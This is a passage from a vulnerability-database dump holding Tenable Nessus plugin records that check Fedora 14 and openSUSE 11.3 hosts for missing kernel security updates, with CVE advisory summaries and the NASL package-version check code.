"FEDORA_2011-1138.NASL", "href": "https://www.tenable.com/plugins/nessus/51949", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-1138.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51949);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-4163\", \"CVE-2010-4165\", \"CVE-2010-4346\", \"CVE-2010-4648\", \"CVE-2010-4649\", \"CVE-2010-4668\", \"CVE-2011-0006\", \"CVE-2011-0521\");\n script_bugtraq_id(44793, 44830, 45323, 45660, 45986, 46073);\n script_xref(name:\"FEDORA\", value:\"2011-1138\");\n\n script_name(english:\"Fedora 14 : kernel-2.6.35.11-83.fc14 (2011-1138)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to kernel 2.6.35.11:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.35/ChangeLog\n-2.6.35.11\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.35/ChangeLog-2.6.35.11\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2e777198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=652508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=652957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=662189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=667916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=672398\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-February/053901.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74a7a9ed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"kernel-2.6.35.11-83.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:28", "description": "The openSUSE 11.3 kernel was updated to fix various bugs and security\nissues.\n\nFollowing security issues have been fixed: CVE-2010-4347: A local user\ncould inject ACPI code into the kernel via the world-writable\n'custom_debug' file, allowing local privilege escalation.\n\nCVE-2010-4258: A local attacker could use a Oops (kernel crash) caused\nby other flaws to write a 0 byte to a attacker controlled address in\nthe kernel. This could lead to privilege escalation together with\nother issues.\n\nCVE-2010-4157: A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\ncould lead to memory corruption in the GDTH driver.\n\nCVE-2010-4165: The do_tcp_setsockopt function in net/ipv4/tcp.c in the\nLinux kernel did not properly restrict TCP_MAXSEG (aka MSS) values,\nwhich allows local users to cause a denial of service (OOPS) via a\nsetsockopt call that specifies a small value, leading to a\ndivide-by-zero error or incorrect use of a signed integer.\n\nCVE-2010-4164: A remote (or local) attacker communicating over X.25\ncould cause a kernel panic by attempting to negotiate malformed\nfacilities.\n\nCVE-2010-4175: A local attacker could cause memory overruns in the RDS\nprotocol stack, potentially crashing the kernel. So far it is\nconsidered not to be exploitable.\n\nCVE-2010-4169: Use-after-free vulnerability in mm/mprotect.c in the\nLinux kernel allwed local users to cause a denial of service via\nvectors involving an mprotect system call.\n\nCVE-2010-3874: A minor heap overflow in the CAN network module was\nfixed. Due to nature of the memory allocator it is likely not\nexploitable.\n\nCVE-2010-4158: A memory information leak in berkely packet filter\nrules allowed local attackers to read uninitialized memory of the\nkernel stack.\n\nCVE-2010-4162: A local denial of service in the blockdevice layer was\nfixed.\n\nCVE-2010-4163: By submitting certain I/O requests with 0 length, a\nlocal user could have caused a kernel panic.\n\nCVE-2010-0435: The Hypervisor in KVM 83, when the Intel VT-x extension\nis enabled, allows guest OS users to cause a denial of service (NULL\npointer dereference and host OS crash) via vectors related to\ninstruction emulation.\n\nCVE-2010-3861: The ethtool_get_rxnfc function in net/core/ethtool.c in\nthe Linux kernel did not initialize a certain block of heap memory,\nwhich allowed local users to obtain potentially sensitive information\nvia an ETHTOOL_GRXCLSRLALL ethtool command with a large info.rule_cnt\nvalue.\n\nCVE-2010-3442: Multiple integer overflows in the snd_ctl_new function\nin sound/core/control.c in the Linux kernel allowed local users to\ncause a denial of service (heap memory corruption) or possibly have\nunspecified other impact via a crafted (1) SNDRV_CTL_IOCTL_ELEM_ADD or\n(2) SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl call.\n\nCVE-2010-3437: A range checking overflow in pktcdvd ioctl was fixed.\n\nCVE-2010-4078: The sisfb_ioctl function in\ndrivers/video/sis/sis_main.c in the Linux kernel did not properly\ninitialize a certain structure member, which allowed local users to\nobtain potentially sensitive information from kernel stack memory via\nan FBIOGET_VBLANK ioctl call.\n\nCVE-2010-4080: The snd_hdsp_hwdep_ioctl function in\nsound/pci/rme9652/hdsp.c in the Linux kernel did not initialize a\ncertain structure, which allowed local users to obtain potentially\nsensitive information from kernel stack memory via an\nSNDRV_HDSP_IOCTL_GET_CONFIG_INFO ioctl call.\n\nCVE-2010-4081: The snd_hdspm_hwdep_ioctl function in\nsound/pci/rme9652/hdspm.c in the Linux kernel did not initialize a\ncertain structure, which allowed local users to obtain potentially\nsensitive information from kernel stack memory via an\nSNDRV_HDSPM_IOCTL_GET_CONFIG_INFO ioctl call.\n\nCVE-2010-4082: The viafb_ioctl_get_viafb_info function in\ndrivers/video/via/ioctl.c in the Linux kernel did not properly\ninitialize a certain structure member, which allowed local users to\nobtain potentially sensitive information from kernel stack memory via\na VIAFB_GET_INFO ioctl call.\n\nCVE-2010-4073: The ipc subsystem in the Linux kernel did not\ninitialize certain structures, which allowed local users to obtain\npotentially sensitive information from kernel stack memory via vectors\nrelated to the (1) compat_sys_semctl, (2) compat_sys_msgctl, and (3)\ncompat_sys_shmctl functions in ipc/compat.c; and the (4)\ncompat_sys_mq_open and (5) compat_sys_mq_getsetattr functions in\nipc/compat_mq.c.\n\nCVE-2010-4072: The copy_shmid_to_user function in ipc/shm.c in the\nLinux kernel did not initialize a certain structure, which allowed\nlocal users to obtain potentially sensitive information from kernel\nstack memory via vectors related to the shmctl system call and the\n'old shm interface.'\n\nCVE-2010-4083: The copy_semid_to_user function in ipc/sem.c in the\nLinux kernel did not initialize a certain structure, which allowed\nlocal users to obtain potentially sensitive information from kernel\nstack memory via a (1) IPC_INFO, (2) SEM_INFO, (3) IPC_STAT, or (4)\nSEM_STAT command in a semctl system call.\n\nCVE-2010-3432: The sctp_packet_config function in net/sctp/output.c in\nthe Linux kernel performed extraneous initializations of packet data\nstructures, which allowed remote attackers to cause a denial of\nservice (panic) via a certain sequence of SCTP traffic.\n\nCVE-2010-3067: Integer overflow in the do_io_submit function in\nfs/aio.c in the Linux kernel allowed local users to cause a denial of\nservice or possibly have unspecified other impact via crafted use of\nthe io_submit system call.\n\nCVE-2010-3865: A iovec integer overflow in RDS sockets was fixed which\ncould lead to local attackers gaining kernel privileges.", "edition": 25, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : kernel (openSUSE-SU-2011:0004-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4163", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4347", "CVE-2010-3067", "CVE-2010-4164", "CVE-2010-3432", "CVE-2010-4078", "CVE-2010-4175", "CVE-2010-3861"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vmi-base", "p-cpe:/a:novell:opensuse:kernel-vmi", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:preload-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-vmi-devel", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:preload-kmp-default", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:kernel-default-base"], "id": "SUSE_11_3_KERNEL-101215.NASL", "href": "https://www.tenable.com/plugins/nessus/75553", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-3709.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75553);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0435\", \"CVE-2010-3067\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3861\", \"CVE-2010-3865\", \"CVE-2010-3874\", \"CVE-2010-4072\", \"CVE-2010-4073\", \"CVE-2010-4078\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4082\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4162\", \"CVE-2010-4163\", \"CVE-2010-4164\", \"CVE-2010-4165\", \"CVE-2010-4169\", \"CVE-2010-4175\", \"CVE-2010-4258\", \"CVE-2010-4347\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2011:0004-1)\");\n script_summary(english:\"Check for the kernel-3709 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 11.3 kernel was updated to fix various bugs and security\nissues.\n\nFollowing security issues have been fixed: CVE-2010-4347: A local user\ncould inject ACPI code into the kernel via the world-writable\n'custom_debug' file, allowing local privilege escalation.\n\nCVE-2010-4258: A local attacker could use a Oops (kernel crash) caused\nby other flaws to write a 0 byte to a attacker controlled address in\nthe kernel. This could lead to privilege escalation together with\nother issues.\n\nCVE-2010-4157: A 32bit vs 64bit integer mismatch in gdth_ioctl_alloc\ncould lead to memory corruption in the GDTH driver.\n\nCVE-2010-4165: The do_tcp_setsockopt function in net/ipv4/tcp.c in the\nLinux kernel did not properly restrict TCP_MAXSEG (aka MSS) values,\nwhich allows local users to cause a denial of service (OOPS) via a\nsetsockopt call that specifies a small value, leading to a\ndivide-by-zero error or incorrect use of a signed integer.\n\nCVE-2010-4164: A remote (or local) attacker communicating over X.25\ncould cause a kernel panic by attempting to negotiate malformed\nfacilities.\n\nCVE-2010-4175: A local attacker could cause memory overruns in the RDS\nprotocol stack, potentially crashing the kernel. So far it is\nconsidered not to be exploitable.\n\nCVE-2010-4169: Use-after-free vulnerability in mm/mprotect.c in the\nLinux kernel allwed local users to cause a denial of service via\nvectors involving an mprotect system call.\n\nCVE-2010-3874: A minor heap overflow in the CAN network module was\nfixed. Due to nature of the memory allocator it is likely not\nexploitable.\n\nCVE-2010-4158: A memory information leak in berkely packet filter\nrules allowed local attackers to read uninitialized memory of the\nkernel stack.\n\nCVE-2010-4162: A local denial of service in the blockdevice layer was\nfixed.\n\nCVE-2010-4163: By submitting certain I/O requests with 0 length, a\nlocal user could have caused a kernel panic.\n\nCVE-2010-0435: The Hypervisor in KVM 83, when the Intel VT-x extension\nis enabled, allows guest OS users to cause a denial of service (NULL\npointer dereference and host OS crash) via vectors related to\ninstruction emulation.\n\nCVE-2010-3861: The ethtool_get_rxnfc function in net/core/ethtool.c in\nthe Linux kernel did not initialize a certain block of heap memory,\nwhich allowed local users to obtain potentially sensitive information\nvia an ETHTOOL_GRXCLSRLALL ethtool command with a large info.rule_cnt\nvalue.\n\nCVE-2010-3442: Multiple integer overflows in the snd_ctl_new function\nin sound/core/control.c in the Linux kernel allowed local users to\ncause a denial of service (heap memory corruption) or possibly have\nunspecified other impact via a crafted (1) SNDRV_CTL_IOCTL_ELEM_ADD or\n(2) SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl call.\n\nCVE-2010-3437: A range checking overflow in pktcdvd ioctl was fixed.\n\nCVE-2010-4078: The sisfb_ioctl function in\ndrivers/video/sis/sis_main.c in the Linux kernel did not properly\ninitialize a certain structure member, which allowed local users to\nobtain potentially sensitive information from kernel stack memory via\nan FBIOGET_VBLANK ioctl call.\n\nCVE-2010-4080: The snd_hdsp_hwdep_ioctl function in\nsound/pci/rme9652/hdsp.c in the Linux kernel did not initialize a\ncertain structure, which allowed local users to obtain potentially\nsensitive information from kernel stack memory via an\nSNDRV_HDSP_IOCTL_GET_CONFIG_INFO ioctl call.\n\nCVE-2010-4081: The snd_hdspm_hwdep_ioctl function in\nsound/pci/rme9652/hdspm.c in the Linux kernel did not initialize a\ncertain structure, which allowed local users to obtain potentially\nsensitive information from kernel stack memory via an\nSNDRV_HDSPM_IOCTL_GET_CONFIG_INFO ioctl call.\n\nCVE-2010-4082: The viafb_ioctl_get_viafb_info function in\ndrivers/video/via/ioctl.c in the Linux kernel did not properly\ninitialize a certain structure member, which allowed local users to\nobtain potentially sensitive information from kernel stack memory via\na VIAFB_GET_INFO ioctl call.\n\nCVE-2010-4073: The ipc subsystem in the Linux kernel did not\ninitialize certain structures, which allowed local users to obtain\npotentially sensitive information from kernel stack memory via vectors\nrelated to the (1) compat_sys_semctl, (2) compat_sys_msgctl, and (3)\ncompat_sys_shmctl functions in ipc/compat.c; and the (4)\ncompat_sys_mq_open and (5) compat_sys_mq_getsetattr functions in\nipc/compat_mq.c.\n\nCVE-2010-4072: The copy_shmid_to_user function in ipc/shm.c in the\nLinux kernel did not initialize a certain structure, which allowed\nlocal users to obtain potentially sensitive information from kernel\nstack memory via vectors related to the shmctl system call and the\n'old shm interface.'\n\nCVE-2010-4083: The copy_semid_to_user function in ipc/sem.c in the\nLinux kernel did not initialize a certain structure, which allowed\nlocal users to obtain potentially sensitive information from kernel\nstack memory via a (1) IPC_INFO, (2) SEM_INFO, (3) IPC_STAT, or (4)\nSEM_STAT command in a semctl system call.\n\nCVE-2010-3432: The sctp_packet_config function in net/sctp/output.c in\nthe Linux kernel performed extraneous initializations of packet data\nstructures, which allowed remote attackers to cause a denial of\nservice (panic) via a certain sequence of SCTP traffic.\n\nCVE-2010-3067: Integer overflow in the do_io_submit function in\nfs/aio.c in the Linux kernel allowed local users to cause a denial of\nservice or possibly have unspecified other impact via crafted use of\nthe io_submit system call.\n\nCVE-2010-3865: A iovec integer overflow in RDS sockets was fixed which\ncould lead to local attackers gaining kernel privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=547887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=584028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=628591\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629901\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=641811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=641983\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642302\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642484\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=651218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=651626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=652945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=654581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655839\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=657350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=659076\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vmi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:preload-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-debug-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-base-2.6.34.7-0.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"kernel-default-devel-2.6.34.7-0.7.1\") ) flag++;\nif ( 